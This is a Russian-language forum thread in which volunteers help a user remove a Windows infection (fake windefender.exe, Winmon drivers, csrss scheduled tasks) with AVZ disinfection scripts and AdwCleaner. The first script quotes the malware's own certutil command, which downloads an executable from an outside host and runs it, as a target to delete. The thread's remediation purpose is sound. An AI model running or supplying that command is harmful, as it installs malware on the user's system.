Перейти к содержанию

Рекомендуемые сообщения

После скачивания программы с сомнительного ресурса (моя вина), обнаружилась гора вредоносного ПО на ноутбуке, баннеры, расширения браузера и тд., всё это я успешно почистила вручную и завершила дело сканированием с помощью Dr.Web Cureit, который нашел еще:
C:\Windows\windefender.exe 
C:\Windows\System32\drivers\WinmonFS.sys 
C:\Windows\System32\drivers\Winmon.sys 
\MSTask\csrss 

Однако, после перезагрузки файлы не удалились и в диспетчере задач я снова вижу все эти процессы, а по указанному пути их нет. они грузят систему, самой удалить не получается. помогите от них избавиться 🤷‍♀️

CollectionLog-2020.10.22-23.17.zip

Ссылка на сообщение
Поделиться на другие сайты

Трассировку маршрутов сами прописывали?

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

{Исправление в службах в реестре, значения ImagePath.
Данный скрипт распространяется свободно и может быть модицифирован по согласованию с авторами - представителями SafeZone.cc
При публикации скрипта данный комментарий и ссылка на VirusNet.Info обязателена. }
var DescriptionTextWuauServ, DispayNameTextWuauServ, DescriptionTextBITS: String;
 DispayNameTextBITS, FullPathSystem32, NameFolderSystem32, FileServiceDll: String;
 ImagePathStr, RootStr, SubRootStr, LangID: string;
 AllRoots, AllKeys, RootsRestored, KeysRestored, KeysFixed: integer;
 FinishMsg, RestoreMsg, FixMsg, CheckMsg: String;
 RegSectMsg, ParamMsg, ParamValueMsg, InRegSectMsg, CorrectMsg, RestMsg: String;

procedure CheckAndRestoreSection(Root: String);
begin
 Inc(AllRoots);
 if RegKeyExistsEx('HKLM', Root) then
   RegKeyResetSecurity('HKLM', Root)
 else
  begin
    Inc(RootsRestored);
    RegKeyCreate('HKLM', Root);
    AddToLog(RegSectMsg + Root + RestMsg);
   end;
end;

procedure CheckAndRestoreSubSection;
begin
  CheckAndRestoreSection(SubRootStr);
end;

procedure RestoredMsg(Root, Param: String);
begin
  AddToLog(ParamMsg + Param + InRegSectMsg + Root + RestMsg);
  Inc(KeysRestored);
end;

procedure FixedMsg(Root, Param: String);
begin
  AddToLog(ParamValueMsg + Param + InRegSectMsg + Root + CorrectMsg);
  Inc(KeysFixed);
end;

procedure RestoreStrParam(Root, Param, Value: String);
begin
  RegKeyStrParamWrite('HKLM', Root, Param, Value);
  RestoredMsg(Root, Param);
end;

procedure CheckAndRestoreStrParam(Root, Param, Value: String);
begin
  Inc(AllKeys);
  if not RegKeyParamExists('HKLM', Root, Param) then
    RestoreStrParam(Root, Param, Value);
end;

procedure CheckAndRestoreIntParam(Root, Param: String; Value: Integer);
begin
 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', Root, Param) then
  begin
    RegKeyIntParamWrite('HKLM', Root, Param, Value);
    RestoredMsg(Root, Param);
  end;
end;

procedure CheckAndRestoreMultiSZParam(Param, Value: String);
begin
 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', RootStr, Param) then
  begin
    ExecuteFile('REG ADD HKLM\' + RootStr + ' /v ' + Param + Value, '', 0, 10000, true);
    RestoredMsg(RootStr, Param);
  end;
end;

// Исправление значения параметра ImagePath для служб 'wuauserv' и 'BITS'
procedure ImagePathFix(Node, Srv: String);
var RegStr: String;
begin
 RegStr := 'SYSTEM\' + Node + '\Services\' + Srv;
 if RegKeyExistsEx('HKLM', RegStr) then
  begin
    Inc(AllKeys);
    RegKeyResetSecurity('HKLM', RegStr);
    RegKeyStrParamWrite('HKLM', RegStr, 'ImagePath', ImagePathStr);
    FixedMsg(RegStr, 'ImagePath');
  end;
end;

{ Выполнение исправление всех ключей в ветках -
   'HKLM\SYSTEM\CurrentControlSet\Services\BITS' и 'HKLM\SYSTEM\CurrentControlSet\Services\wuauserv'}
procedure CorrectRegistryRoot(DescriptionText, DisplayNameText, Srv: String);
var FileServiceDll, CCSNumber: string;
     i : integer;
begin
 if Srv = 'BITS' then
   FileServiceDll := FullPathSystem32 + 'qmgr.dll'
 else
   FileServiceDll := FullPathSystem32 + 'wuauserv.dll';
 RootStr:= 'SYSTEM\CurrentControlSet\Services\' + Srv;

 CheckAndRestoreSection(RootStr);

 CheckAndRestoreStrParam(RootStr, 'Description', DescriptionText);
 CheckAndRestoreStrParam(RootStr, 'DisplayName', DisplayNameText);
 CheckAndRestoreStrParam(RootStr, 'ObjectName', 'LocalSystem');

 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', RootStr, 'ImagePath') then
   RestoreStrParam(RootStr, 'ImagePath', ImagePathStr)
 else
  begin
    Dec(AllKeys);
    if LowerCase(RegKeyStrParamRead('HKLM', RootStr, 'ImagePath')) <> LowerCase(ImagePathStr) then
      for i:= 0 to 999 do
       begin
         if i > 0 then
           CCSNumber := FormatFloat('ControlSet000', i)
         else
           CCSNumber := 'CurrentControlSet';
         ImagePathFix(CCSNumber, Srv);
      end;
   end;

 CheckAndRestoreIntParam(RootStr, 'ErrorControl', 1);
 CheckAndRestoreIntParam(RootStr, 'Start', 2);
 CheckAndRestoreIntParam(RootStr, 'Type', 32);

 if Srv = 'BITS' then
  begin
    CheckAndRestoreMultiSZParam('DependOnService', ' /t REG_MULTI_SZ /d RpcSs');
    CheckAndRestoreMultiSZParam('DependOnGroup', ' /t REG_MULTI_SZ');
  end;

 SubRootStr:= RootStr + '\Enum';
 CheckAndRestoreSubSection;

 CheckAndRestoreStrParam(SubRootStr, '0', 'Root\LEGACY_' + UpperCase(Srv) + '\0000');
 CheckAndRestoreIntParam(SubRootStr, 'Count', 1);
 CheckAndRestoreIntParam(SubRootStr, 'NextInstance', 1);

 SubRootStr := RootStr + '\Security';
 CheckAndRestoreSubSection;

 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', SubRootStr, 'Security') then
  begin
    RegKeyBinParamWrite('HKLM', SubRootStr, 'Security', '01,00,14,80,78,00,00,00,84,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,00,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,48,00,03,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00');
    RestoredMsg(SubRootStr, 'Security');
  end;

 SubRootStr:= RootStr + '\Parameters';
 CheckAndRestoreSubSection;

 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', SubRootStr, 'ServiceDll') then
  begin
    RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
    RestoredMsg(SubRootStr, 'ServiceDll');
  end
 else if LowerCase(RegKeyStrParamRead('HKLM', SubRootStr, 'ServiceDll')) <> LowerCase(FileServiceDll) then
  begin
    RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
    FixedMsg(SubRootStr, 'ServiceDll');
  end
end;

{ Главное выполнение }
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 TerminateProcessByName('c:\windows\rss\csrss.exe');
 TerminateProcessByName('c:\users\mistress\appdata\local\temp\csrss\u20200626.exe');
 TerminateProcessByName('c:\users\mistress\appdata\local\temp\csrss\ww24.exe');
 QuarantineFile('c:\windows\rss\csrss.exe', '');
 QuarantineFile('c:\users\mistress\appdata\local\temp\csrss\u20200626.exe', '');
 QuarantineFile('c:\users\mistress\appdata\local\temp\csrss\ww24.exe', '');
 QuarantineFile('C:\Windows\Temp\kjmGSURZTYOfniSI\wyHjuFAighgBsSf\bakxgxh.exe', '');
 QuarantineFile('C:\Users\mistress\AppData\Local\Temp\csrss\scheduled.exe', '');
 QuarantineFile('C:\Users\mistress\appdata\local\temp\csrss\wup\xarch\wup.exe', '');
 DeleteFile('c:\windows\rss\csrss.exe', '');
 DeleteFile('c:\users\mistress\appdata\local\temp\csrss\u20200626.exe', '');
 DeleteFile('c:\users\mistress\appdata\local\temp\csrss\ww24.exe', '');
 DeleteFile('C:\Windows\rss\csrss.exe', '32');
 DeleteFile('C:\Windows\rss\csrss.exe', '64');
 DeleteFile('C:\Windows\Temp\kjmGSURZTYOfniSI\wyHjuFAighgBsSf\bakxgxh.exe', '32');
 DeleteFile('cmd.exe  /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\mistress\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\mistress\AppData\Local\Temp\csrss\scheduled.exe /31340', '64');
 DeleteFile('C:\Users\mistress\AppData\Local\Temp\csrss\scheduled.exe', '64');
 DeleteFile('C:\Windows\Temp\kjmGSURZTYOfniSI\wyHjuFAighgBsSf\bakxgxh.exe', '64');
 DeleteFile('C:\Users\mistress\appdata\local\temp\csrss\scheduled.exe', '');
 DeleteFile('C:\Users\mistress\appdata\local\temp\csrss\wup\xarch\wup.exe', '');
 ClearLog;
 ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\wuauserv', 'wuauserv.reg');
 ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\BITS', 'BITS.reg');
 LangID:= RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Nls\Language', 'InstallLanguage');
 if LangID = '0419' then
  begin
    DescriptionTextWuauServ := 'Включает загрузку и установку обновлений Windows. Если служба отключена, то на этом компьютере нельзя будет использовать возможности автоматического обновления или веб-узел Центра обновления Windows.';
    DispayNameTextWuauServ := 'Автоматическое обновление';
    DescriptionTextBITS := 'Обеспечивает передачу данных между клиентами и серверами в фоновом режиме. Если служба BITS отключена, такие возможности, как Windows Update, не могут правильно работать.';
    DispayNameTextBITS := 'Фоновая интеллектуальная служба передачи (BITS)';
    AddToLog('Операционная система - русская');
    FinishMsg := '–––– Восстановление завершено ––––';
    RestoreMsg := 'Восстановлено разделов\параметров: ';
    FixMsg := 'Исправлено параметров: ';
    CheckMsg := 'Проверено разделов\параметров: ';
    RegSectMsg := 'Раздел реестра HKLM\';
    ParamMsg := 'Параметр ';
    ParamValueMsg := 'Значение параметра ';
    InRegSectMsg := ' в разделе реестра HKLM\';
    CorrectMsg := ' исправлено на оригинальное.';
    RestMsg := 'восстановлен.';
  end
 else
  begin
    DescriptionTextWuauServ := 'Enables the download and installation of Windows updates. If this service is disabled, this computer will not be able to use the Automatic Updates feature or the Windows Update Web site.';
    DispayNameTextWuauServ := 'Automatic Updates';
    DescriptionTextBITS := 'Transfers data between clients and servers in the background. If BITS is disabled, features such as Windows Update will not work correctly.';
    DispayNameTextBITS := 'Background Intelligent Transfer Service';
    AddToLog('Operation system - english');
    FinishMsg := '–––– Restoration finished ––––';
    RestoreMsg := 'Sections\parameters restored: ';
    FixMsg := 'Parameters corrected: ';
    CheckMsg := 'Sections\parameters checked: ';
    RegSectMsg := 'Registry section HKLM\';
    ParamMsg := 'Parameter ';
    ParamValueMsg := 'Value of parameter ';
    InRegSectMsg := ' in registry section HKLM\';
    CorrectMsg := ' corrected on original.';
    RestMsg := ' restored.';
  end;
 AddToLog('');

{ Определение папки X:\Windows\System32\ }
 NameFolderSystem32 := RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Windows', 'SystemDirectory');
 ImagePathStr := NameFolderSystem32 + '\svchost.exe -k netsvcs';
 Delete(NameFolderSystem32, 1, pos('\', NameFolderSystem32) - 1);
 FullPathSystem32 := GetEnvironmentVariable('WinDir') + NameFolderSystem32 + '\';

 AllRoots := 0;
 AllKeys := 0;
 RootsRestored := 0;
 KeysRestored := 0;
 KeysFixed := 0;

 CorrectRegistryRoot(DescriptionTextBITS, DispayNameTextBITS, 'BITS');
 CorrectRegistryRoot(DescriptionTextWuauServ, DispayNameTextWuauServ, 'wuauserv');

 AddToLog('');
 AddToLog(FinishMsg);
 AddToLog('');
 AddToLog(RestoreMsg + IntToStr(RootsRestored) + ' \ ' + IntToStr(KeysRestored));
 AddToLog(FixMsg + IntToStr(KeysFixed));
 AddToLog(CheckMsg + IntToStr(AllRoots) + ' \ ' + IntToStr(AllKeys));
 SaveLog(RegKeyStrParamRead('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders', 'Desktop') + '\Correct_wuauserv&BITS.log');
 TerminateProcessByName('c:\users\mistress\appdata\local\temp\csrss\ww24.exe');
 TerminateProcessByName('c:\users\mistress\appdata\roaming\b9cdde3b480f\b9cdde3b480f.exe');
 TerminateProcessByName('c:\windows\rss\csrss.exe');
 QuarantineFile('c:\users\mistress\appdata\local\temp\csrss\ww24.exe', '');
 QuarantineFile('c:\windows\rss\csrss.exe', '');
 QuarantineFile('C:\Windows\windefender.exe', '');
 QuarantineFileF('c:\users\mistress\appdata\local\temp\csrss', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 QuarantineFileF('c:\users\mistress\appdata\roaming\b9cdde3b480f', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 DeleteFile('c:\users\mistress\appdata\local\temp\csrss\ww24.exe', '32');
 DeleteFile('c:\windows\rss\csrss.exe', '32');
 DeleteFile('C:\Windows\windefender.exe', '32');
 DeleteFileMask('c:\users\mistress\appdata\local\temp\csrss', '*', true);
 DeleteFileMask('c:\users\mistress\appdata\roaming\b9cdde3b480f', '*', true);
 DeleteDirectory('c:\users\mistress\appdata\local\temp\csrss');
 DeleteDirectory('c:\users\mistress\appdata\roaming\b9cdde3b480f');
 DeleteSchedulerTask('csrss');
 DeleteSchedulerTask('ScheduledUpdate');
 DeleteSchedulerTask('ScheduledUpdate');   DeleteSchedulerTask('YjuvlbImHgDMaWtHI.job');
 DeleteSchedulerTask('YjuvlbImHgDMaWtHI');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'BlueBird', '32');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'BlueBird', '64');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'BlueBird', 'x32');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'BlueBird', 'x64');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'CloudNet', 'x64');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteRepair(3);
 ExecuteRepair(4);
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

 

Компьютер перезагрузится.

 

Полученный архив quarantine.zip из папки с распакованной утилитой AVZ на этот почтовый ящик: newvirus@kaspersky.com[

 

 

 

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".

Изменено пользователем regist
Ссылка на сообщение
Поделиться на другие сайты
17 часов назад, regist сказал:

Трассировку маршрутов сами прописывали?

Доброй ночи, нет, я ничего не прописывала

17 часов назад, regist сказал:

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

скрипт не хочет работать или я что-то не так делаю

Ошибка скрипта: ')' expected, позиция [278:2]
Ошибка скрипта: Undeclared identifier: 'DeleteSchedulerTask', позиция [253:21]

 

прошу прощения, все сработало (изначально запускала АВЗ не из автологгера)
после перезагрузки всё чисто, насколько я могу сейчас судить, спасибо большое 🥰
прикрепляю логи повторной диагностики

  

CollectionLog-2020.10.23-00.36.zip

Ссылка на сообщение
Поделиться на другие сайты

После выполнения скрипта на рабочем столе должен был появится текстовый файл Correct_wuauserv&BITS.log. Прикрепите его к следующему сообщению.
 

Ссылка на сообщение
Поделиться на другие сайты
8 часов назад, Sandor сказал:

После выполнения скрипта на рабочем столе должен был появится текстовый файл Correct_wuauserv&BITS.log. Прикрепите его к следующему сообщению.
 

Здравствуйте, после скрипта этот файл не появился, только quarantine.zip, который я отправила на указанный адрес 

Ссылка на сообщение
Поделиться на другие сайты
23 часа назад, auntmary сказал:

скрипт не хочет работать или я что-то не так делаю

Ошибка скрипта: ')' expected, позиция [278:2]

Поправил, попробуйте ещё раз.

Ссылка на сообщение
Поделиться на другие сайты
23.10.2020 в 23:40, regist сказал:

Поправил, попробуйте ещё раз.

 

снова здравствуйте, только сейчас заметила последствия вируса, а именно невозможно открыть дискорд на компьютере и переустановить его так же не выходит, есть ли решение у этой проблемы?

 

при попытке установить дискорд выдает 

image.png.6c4af4789d2bff6db3a735ff486b3db3.png

 

23.10.2020 в 08:23, Sandor сказал:

После выполнения скрипта на рабочем столе должен был появится текстовый файл Correct_wuauserv&BITS.log. Прикрепите его к следующему сообщению.
 

только сейчас заметила, что файл появился на рабочем столе второй учетной записи!

Correct_wuauserv&BITS.log

Ссылка на сообщение
Поделиться на другие сайты

Ещё раз, пожалуйста, соберите свежий CollectionLog.

Дополнительно:

  • Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
  • Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Запустить проверку") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt (где x - любая цифра).
  • Прикрепите отчет к своему следующему сообщению.

Подробнее читайте в этом руководстве.
 

Ссылка на сообщение
Поделиться на другие сайты
22.10.2020 в 21:02, regist сказал:

Полученный архив quarantine.zip из папки с распакованной утилитой AVZ на этот почтовый ящик: newvirus@kaspersky.com[

 

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".

То есть заново отправьте карантин.  И жду лога Автологера.

 

5 часов назад, auntmary сказал:

файл появился на рабочем столе второй учетной записи!

Он появляется в той учётной записи в которой выполняли скрипт. Логи собирать и скрипты выполнять надо в одной учётной записи, а не в разных.

Ссылка на сообщение
Поделиться на другие сайты
26.10.2020 в 09:06, Sandor сказал:

Ещё раз, пожалуйста, соберите свежий CollectionLog.

Дополнительно:

 

  • Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
  • Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Запустить проверку") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt (где x - любая цифра).
  • Прикрепите отчет к своему следующему сообщению.

 

Подробнее читайте в этом руководстве.
 

 

все сделала, вот логи. эх снова те же вирусы 🙂 
 

AdwCleaner[C00].txt AdwCleaner[S00].txt

 

26.10.2020 в 10:45, regist сказал:

То есть заново отправьте карантин.  И жду лога Автологера.

 

Он появляется в той учётной записи в которой выполняли скрипт. Логи собирать и скрипты выполнять надо в одной учётной записи, а не в разных.


я все делала в своей учетной записи, просто я её когда то не совсем правильно переименовала (у меня руки не совсем из того места выросли) и логи оказались в пустой папке с прошлым именем пользователя. мне все равно стоит всё проделать заново?

Ссылка на сообщение
Поделиться на другие сайты
15 часов назад, auntmary сказал:

AdwCleaner[C00].txt

разве кто-то просил вас удалять найденное?

 

15 часов назад, auntmary сказал:

мне все равно стоит всё проделать заново?

Надо делать только то, что просят

26.10.2020 в 07:45, regist сказал:

заново отправьте карантин.  И жду лога Автологера.

 

Ссылка на сообщение
Поделиться на другие сайты

1) Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

2) Скачайте этот архив. Запустите рег-файлы из архива и согласитесь на внесение изменений в реестр.

3) Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

begin
 ClearQuarantineEx(true);
 QuarantineFile('C:\Program Files (x86)\xduJFODYU\nZWnqg.dll', '');
 DeleteFile('C:\Program Files (x86)\xduJFODYU\nZWnqg.dll', '64');
 DeleteSchedulerTask('{7F9FD259-8224-4672-BBA9-DBA84C2F0B3A}');
 DeleteSchedulerTask('lAdMHZBqUcXIeKJ');
 DeleteSchedulerTask('Lenovo\Lenovo Service Bridge\S-1-5-21-3833064128-939169056-4125991240-1001');
 DeleteSchedulerTask('TVT\TVSUUpdateTask_UserLogOn');
 DelCLSID('OpenVPN_UserSetup');
ExecuteSysClean;
 ExecuteRepair(20);
RebootWindows(true);
end.

 

Компьютер перезагрузится.

 

4)

- Перетащите лог Check_Browsers_LNK.log из папки AutoLogger\CheckBrowsersLNK на утилиту ClearLNK. Отчёт о работе прикрепите.

 

5) Запустите снова AutoLogger, соберите и прикрепите свежие логи.

Изменено пользователем regist
Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Похожий контент

    • От Pru
      Здравствуйте. Словили вирус шифровальщик. Помогите.
      FRST.txt Addition.txt
    • От Иван71
      Здравствуйте. Не могу установить KIS, оишбка при установке. Проблема следующая. Заметил что компьютер начал сильно "грузится" даже в режиме простоя. Обратил внимание что что то грузит его на 100% при том что я ничего не делаю вообще. При открытии диспетчера задач процесс тут же "прячется" и нагрузка падает на комп. В файле hosts было это содержимое: 
       
      кое как вроде удалось все очистить, но проблему это решило не до конца. KVRT не ставится, "Ошибка загрузки драйвера" ; "Ошибка загрузки драйвера расширенного мониторинга"
      CollectionLog-2021.01.21-12.26.zip
    • От demwf
      Подхватил вирус. Были проблемы в том числе и с доступом к сети интернет.
      Запускал много утилит антивирусных. Порядка 10 штук. Чистил и тд.
      Интернет появился, но подозреваю что вирус сохранился в системе.
      Симптомы.
      Могу войти в папки(папки от вируса, например C:\ProgramData\Install) через написание адреса, но не вижу папки через проводник.
      Не устанавливается антивирус малваре байтс.
       
       
      CollectionLog-2021.01.21-00.39.zip
    • От jekanegr
      Добрый день.
      Скинули файл, который был запущен на ноутбуке и после проверки вирустотал показал, что в файле содержится вирус GrayWare/Win32.Kryptik.BQX

      Подскажите, пожалуйста, как можно избавиться от вируса?
       
    • От Tonikola
      Появляется вирус mem trojan.win32.sepeh.gen, KIS мне предлагает удалить вирус с помощью перезагрузки ПК. После того как KIS удалил вирус после перезагрузки, то спустя некоторое время, сутки-двое, появляется снова этот вирус, и так каждый раз. Прошло около трех недель после появления этого вируса
      CollectionLog-2021.01.18-00.25.zip
×
×
  • Создать...